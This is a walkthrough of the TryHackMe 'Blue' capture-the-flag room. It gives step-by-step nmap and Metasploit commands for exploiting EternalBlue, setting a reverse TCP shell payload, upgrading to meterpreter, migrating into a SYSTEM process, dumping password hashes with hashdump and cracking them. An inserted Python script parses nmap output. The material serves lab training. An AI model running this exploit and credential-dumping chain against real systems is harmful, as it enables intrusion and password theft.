Connect to the TryHackMe lab environment either through the VPN or by using the AttackBox on the TryHackMe site.
1.1 Scan the machine. (If you are unsure how to tackle this, I recommend checking out the Nmap room.)
Type in the command:
nmap -T4 -p- MACHINE_IP
1.2 How many ports are open with a port number under 1000?
Count only the lines in the scan output whose state is open (not filtered) and whose port number is below 1000; the high-numbered RPC ports do not count.
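To show how that count is taken from the scan, here is an added example (my own code, not part of the original room or walkthrough) that parses nmap's normal output and counts open ports below 1000. The scan text it reads is constructed for illustration; the host address and port list are invented and are not the lab's real results.

```python
import re

# Constructed sample of "nmap -T4 -p- MACHINE_IP" output (invented host and
# ports for illustration; not the lab's real scan)
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 10.10.10.10
Host is up (0.031s latency).
Not shown: 65528 closed ports
PORT      STATE    SERVICE
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
445/tcp   open     microsoft-ds
3389/tcp  open     ms-wbt-server
49152/tcp open     unknown
49153/tcp open     unknown
49154/tcp filtered unknown
"""

# One port line of nmap's normal output: "<port>/<proto> <state> <service>"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
)


def parse_ports(output: str):
    """Return (port, proto, state, service) for every port line in the output."""
    found = []
    for line in output.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            found.append((int(m["port"]), m["proto"], m["state"], m["service"]))
    return found


def open_ports(output: str):
    """Only ports nmap reports as 'open'; 'filtered' and 'closed' are dropped."""
    return [p for p in parse_ports(output) if p[2] == "open"]


def count_open_below(output: str, limit: int = 1000) -> int:
    """Number of open ports strictly below `limit` (the room's 'under 1000')."""
    return sum(1 for p in open_ports(output) if p[0] < limit)


if __name__ == "__main__":
    for port, proto, state, service in open_ports(SAMPLE_NMAP_OUTPUT):
        print(f"{port}/{proto} {service}")
    print("open ports under 1000:", count_open_below(SAMPLE_NMAP_OUTPUT))
```

Run it against a real scan by replacing SAMPLE_NMAP_OUTPUT with the saved output of nmap -oN; the answer to 1.2 is whatever count_open_below returns for that file.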
1.3 What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)
Search for "EternalBlue"; the Microsoft security bulletin that patched it is the answer, in the ms??-??? form the question asks for.
2.1 Start Metasploit by typing in the terminal:
msfconsole
2.2 Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)
Inside msfconsole, search for the module (for example search eternalblue) and note the full exploit path shown in the results.
2.3 Show options and set the one required value. What is the name of this value? (All caps for submission)
You need to select the module first (use followed by its result number or full path), then view its options:
use 2
options
set RHOSTS MACHINE_IP
2.4 Run the exploit
Set the payload:
set payload windows/x64/shell/reverse_tcp
Then set LHOST to tun0, which tells Metasploit to listen on the VPN tunnel interface, i.e. the IP TryHackMe gave you. If you are on the AttackBox rather than the VPN, use the AttackBox's IP instead.
set LHOST tun0
Now type run or exploit.
Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.
Once the shell appears, press CTRL+Z and confirm to push the session to the background. (The background command only works inside a meterpreter session; in a plain command shell it would be sent to the remote cmd.exe instead.)
3.1 If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
I found this article that may help: How to Upgrade Command Shell to Meterpreter (hackingarticles.in)
3.2 Select this (use MODULE_PATH). Show options, what option are we required to change?
Run options; the value you have to set identifies which backgrounded session to upgrade, and you can find its number with sessions -l. Once the module has run, the new meterpreter session appears as a second session.
Type sessions 2 to interact with it (check the numbering with sessions -l if it differs).
Type getuid to see which user you are running as.
To list all running processes, type ps.
You can now migrate to a chosen process that runs as NT AUTHORITY\SYSTEM by typing migrate PROCESS_ID.
I migrated into spoolsv.exe.
4.1 Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
Because we migrated into a SYSTEM process, we now have the privileges hashdump needs. Type the command:
hashdump
4.2 Copy this password hash to a file and research how to crack it. What is the cracked password?
Each hashdump line has the form user:RID:LM hash:NT hash:::. Copy the NT hash (the part between the third and fourth colons), go to crackstation.net and paste it in to get the password. It is that simple. If you want to crack it yourself, you can do so with hashcat in NTLM mode (-m 1000) and the rockyou wordlist.
The answer is the password you found.
5.1 Flag1? This flag can be found at the system root.
Use the command shell we still have (or type shell from the meterpreter session) and list the files in C:\.
Once you have found the flag file, read it with type <nameoffile>.
The room then asks for more flags. No problem, just search for them with the following command, which lists every file on the drive recursively and pauses after each page:
dir /s /p
The listing reveals where the remaining flags are. Remember to read each file with type <nameoffile>.
I had already done this exploit with Metasploit on a HackTheBox machine called Blue. It is very good for building some skills with Metasploit and starting to understand the basics. Overall it is a good room which you should not miss.